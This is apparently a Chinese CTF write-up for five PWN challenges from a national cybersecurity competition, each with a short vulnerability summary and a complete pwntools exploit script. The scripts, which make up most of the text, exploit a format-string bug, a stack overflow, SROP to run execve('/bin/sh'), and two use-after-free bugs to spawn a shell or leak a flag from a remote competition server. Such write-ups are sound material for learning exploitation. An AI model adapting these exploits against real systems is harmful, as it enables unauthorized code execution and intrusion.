第六届全国网络空间安全技术大赛PWN WP

First Post:

Last Update:

Word Count:
1.8k

Read Time:
10 min

bank

密码为随机值,若密码第一个字节为’\x00’时,若我们输入为’\x00’,则两个相等,所以输入’\x00’,成功几率为1 /256,在通过格式化字符串漏洞将堆中的flag打印出来即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'bank'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10000"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    p = 'A'
    sla(':', p)
    sl('\x00')
    ru('?')
    sl('yes')
    #db()
    sl('%8$s')
    
def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    for i in range(255):
        try:
            if LOCAL:
                elf = ELF(elf_path)
                if LIBC:
                    libc = ELF(libc_path)
                io = elf.process()
            else:
                elf = ELF(elf_path)
                io = remote(host.split(':')[0], int(host.split(':')[1]))
                if LIBC:
                    libc = ELF(libc_path)
            exploit()
            finish()
        except:
            continue

auto

先采用angr来 fuzz找到进入login_again函数的输入

angr脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import angr
from binascii import b2a_hex
import logging
import sys
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./auto')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x0804867E) # call login_again
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

login_again就是个堆栈溢出了,留有后面,直接跳到后门函数。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'auto'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10001"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    # 55 58 59 55 4b 56 4e 5a
    p = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
    s(p)
    #db()
    p = b'\x00' * 0x48
    p += p32(0x0)
    p += p32(0x08048665)
    sl(p)
    
def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

small

采用srop进行构造出execve(“/bin/sh”, 0, 0)拿 shell

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

elf_path  = 'small'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10002"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    syscall_ret = 0x40100A
    vul_addr  = 0x40100D 
    bss = elf.bss() + 0x100

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_read
    sigframe.rdi = 0
    sigframe.rsi = bss
    sigframe.rdx = 0x200
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'\x11' * 0x18 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    s(p)

    # set rax=15 and call sigreturn
    sleep(0.1)
    p = b'\x00' * 15
    s(p)

    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_execve
    sigframe.rdi = bss  # "/bin/sh" 's addr
    sigframe.rsi = 0x0
    sigframe.rdx = 0x0
    sigframe.rsp = bss + 0x18
    sigframe.rip = syscall_ret

    p = b'/bin/sh\x00' + b'\x00' * 0x10 + p64(vul_addr) + p64(syscall_ret) + bytes(sigframe)
    sleep(0.1)
    s(p)

    # call sigreturn
    p = b'\x00' * 15
    #db()
    sleep(0.1)
    s(p)



def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

paper

uaf漏洞,开辟堆块到v8 - 8处,修改v9值为0xcccccccc拿shell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'paper'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "81.70.195.166:10003"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad():
    sla('>', '1')

def rm(idx):
    sla('>', '2')
    sla(':', str(idx))

def wt(idx, n):
    sla('>', '3')
    sla(':', str(idx))
    sla(':', str(n))

def fd():
    sla('>', '4')

def mv(idx):
    sla('>', '5')
    sla('?', str(idx))

def sh():
    sla('>', '6')

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    ad()
    rm(0)
    fd()
    ru('0x')
    v8 = int(r(12), 16)
    li('v8: ' + hex(v8))
    mv(0x21)
    wt(0, v8 - 8)
    ad() # 1
    ad() # 2
    wt(2, 0xCCCCCCCC)
    sh()
    #db()

    
def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

managebooks

漏洞为uaf,在打印Summary函数中,采用函数指针调用,修改该函数指针,即可劫持rip,先泄漏libc,再调用system即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = 'managebooks'
libc_path = '/glibc/2.27/64/lib/libc.so.6'

# remote server ip and port
host = "81.70.195.166:10004"

# if local debug
LOCAL = 0
LIBC  = 1
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad(name_sz, name, data_sz, data):
    sla('>>', '1')
    sla(':', str(name_sz))
    sa(':', name)
    sla(':', str(data_sz))
    sa(':', data)

def rm(idx):
    sla('>>', '2')
    sla(':', str(idx))


def ch(idx, sz, data):
    sla('>>', '3')
    sla(':', str(idx))
    sla(':', str(sz))
    sa(':', data)
def rd(idx):
    sla('>>', '4')
    sla(':', str(idx))
#--------------------------exploit--------------------------
def exploit():
    bookcase = 0x6020C0
    li('exploit...')
    ad(0x10, 'AAAA', 0x500, 'bbbb')
    rm(0)
    rm(0)
    ch(0, 0x80, '\x10') # free sum and alloc

    ad(0x10, p64(elf.plt['puts']), 0x30, '/bin/sh\x00') # 1

    '''
    rm(0)
    #ad(0x10, p64(bookcase), 0x20, 'bbbb')
    '''

    rd(0) # leak libc
    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - libc.sym['__malloc_hook'] - 976 - 0x10
    li('libc_base: ' + hex(libc_base))

    rm(1)
    rm(1)

    ad(0x10, p64(libc_base + libc.sym['system']), 0x30, '\x00') # 1
    #db()
    rd(1) # call system


def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        libc_path = './libc.so.6'
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

打赏点小钱
支付宝 | Alipay
微信 | WeChat